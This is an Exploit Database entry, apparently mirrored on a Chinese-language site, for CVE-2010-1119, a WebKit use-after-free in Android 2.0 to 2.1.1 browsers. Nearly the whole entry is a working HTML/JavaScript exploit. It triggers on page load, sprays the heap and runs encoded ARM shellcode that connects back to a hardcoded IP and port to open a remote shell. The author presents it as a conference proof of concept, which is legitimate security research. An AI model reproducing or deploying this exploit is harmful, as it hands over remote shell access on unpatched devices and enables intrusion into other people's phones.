Google Android 2.0/2.1/2.1.1 – WebKit Use-After-Free

• Exploit Database
• 89 阅读

• 作者： MJ Keith
  日期： 2011-03-14
• 类别：

  • remote
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/16974/

• <html>
  <!-- 
  # Exploit Title: android exploit for 2010-1119 use after free
  # Date: 2011/03/11
  # Author: MJ Keith
  # Software Link: http://www.android.com/
  # Version: 2.0 ,2.1 , 2.1.1
  # Tested on: Android
  # CVE : 2010-1119
  
  This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides
  email: mkeith AT exploitscience.org
  -->
  
  <head>
  <script language="JavaScript">
  function heap()
  {
  
  var id = document.getElementById("target");
  var attribute = id.getAttributeNode('id');
  nodes = attribute.childNodes;
  document.body.removeChild(id);
  attribute.removeChild(nodes[0]);
  setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };
  
  
  var scode = unescape("\u0060\u0060");
  var scode2 = unescape("\u5005\ue1a0");
  var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
  \u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
  shell += unescape("\uae08"); // Port = 2222
  shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
  shell += unescape("\u2000\u2000"); // string terminate
  
   do
   {
  scode += scode;
  scode2 += scode2;
  
   } while (scode.length<=0x1000);
   
  scode2 += shell
   
  
  target = new Array();
  for(i = 0; i < 300; i++){
  
  if (i<130){ target[i] = scode;}
  if (i>130){ target[i] = scode2;}
  
  document.write(target[i]);
  document.write("<br />");
  if (i>250){
   //alert("freeze");
   nodes[0].textContent}
  
  }
  
   }, 0);
  }
  </script>
  </head>
  <body onload=heap()>
  <p id=target></p>
  </body>
  </html>
  

  Python

  Copy